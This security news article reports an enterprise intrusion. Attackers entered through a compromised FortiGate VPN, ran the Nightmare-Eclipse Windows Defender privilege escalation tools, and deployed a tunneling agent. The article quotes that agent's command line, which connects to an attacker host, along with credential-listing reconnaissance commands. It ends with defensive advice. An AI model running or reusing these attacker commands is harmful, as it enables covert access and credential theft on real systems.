Security researchers have confirmed the first real-world deployment of Nightmare-Eclipse privilege escalation tools in an enterprise attack. The incident involved hackers who gained unauthorized access through a compromised FortiGate SSL VPN before deploying BlueHammer, RedSun, and UnDefend exploits against Windows Defender.
The attack represents a significant escalation in threat actor tactics, as it marks the first time these publicly available tools have been used in a live enterprise environment. This development reported by Huntress raises immediate concerns for security teams worldwide, particularly those managing Windows environments with FortiGate VPN infrastructure.
The Nightmare-Eclipse toolkit explained
The tools at the center of this attack were created by a security researcher known as Chaotic Eclipse or Nightmare-Eclipse. This pseudonymous figure became frustrated with Microsoft’s vulnerability disclosure process and publicly released several local privilege escalation exploits in retaliation.
The three main tools target logic flaws in Windows Defender’s privileged operations:
- BlueHammer – Escalates unprivileged user accounts to SYSTEM-level access
- RedSun – Provides similar privilege escalation capabilities
- UnDefend – Disrupts Windows Defender security functions without requiring admin rights
Microsoft patched BlueHammer in its April 2026 Patch Tuesday update, assigning it CVE-2026-33825. However, RedSun and UnDefend remain unpatched zero-day vulnerabilities that work against fully updated Windows systems.
Attack timeline and initial breach
Huntress first detected suspicious activity on April 10, 2026, when a binary called FunnyApp.exe was executed from a victim’s Pictures folder. This file was pulled directly from the public BlueHammer GitHub repository and was quickly quarantined by Windows Defender.
The attack escalated on April 16, with investigators observing:
- RedSun.exe execution from the Downloads directory
- Multiple executions of undef.exe (UnDefend) from short two-letter subfolders
- Misspelled command flags indicating operator inexperience
Customer VPN logs revealed the initial breach method. On April 15, 2026, an attacker used valid credentials to establish an SSL VPN connection to the victim’s FortiGate firewall from IP address 78.29.48.29, located in Russia. Subsequent unauthorized sessions originated from Singapore and Switzerland, suggesting credential sharing or resale.
The most dangerous component: BeigeBurrow
While the privilege escalation attempts largely failed, investigators identified a more concerning tool called BeigeBurrow. This Go-compiled Windows binary executed as ‘agent.exe -server staybud.dpdns.org:443 -hide’ and successfully established a persistent connection to attacker infrastructure.
BeigeBurrow uses HashiCorp’s Yamux multiplexing library to create a covert TCP relay over port 443, which enterprises rarely block. Unlike the other tools, this component achieved its intended purpose and has been observed in at least one other unrelated intrusion.
Security researchers also confirmed hands-on-keyboard attacker activity through post-exploitation commands including ‘whoami /priv’, ‘cmdkey /list’, and ‘net group’. Notably, one command was spawned directly from an M365Copilot.exe process, though investigators could not explain this anomaly.
Immediate security recommendations
Organizations should treat any execution of these binaries as high-priority incidents. Security teams should implement these immediate actions:
- Apply patches – Install Microsoft’s April 2026 Patch Tuesday update to fix CVE-2026-33825
- Hunt for artifacts – Search user-writable paths like Pictures and Downloads folders for suspicious binaries
- Review VPN logs – Flag accounts authenticating from multiple countries within short timeframes
- Monitor tunneling – Investigate any agent.exe executions with -server and -hide flags
- Block infrastructure – Add staybud.dpdns.org to network blocklists
This incident highlights how publicly available exploit tools can quickly transition from proof-of-concept to active threat. With two zero-day vulnerabilities still unpatched, organizations running Windows environments face continued risk until Microsoft releases additional security updates.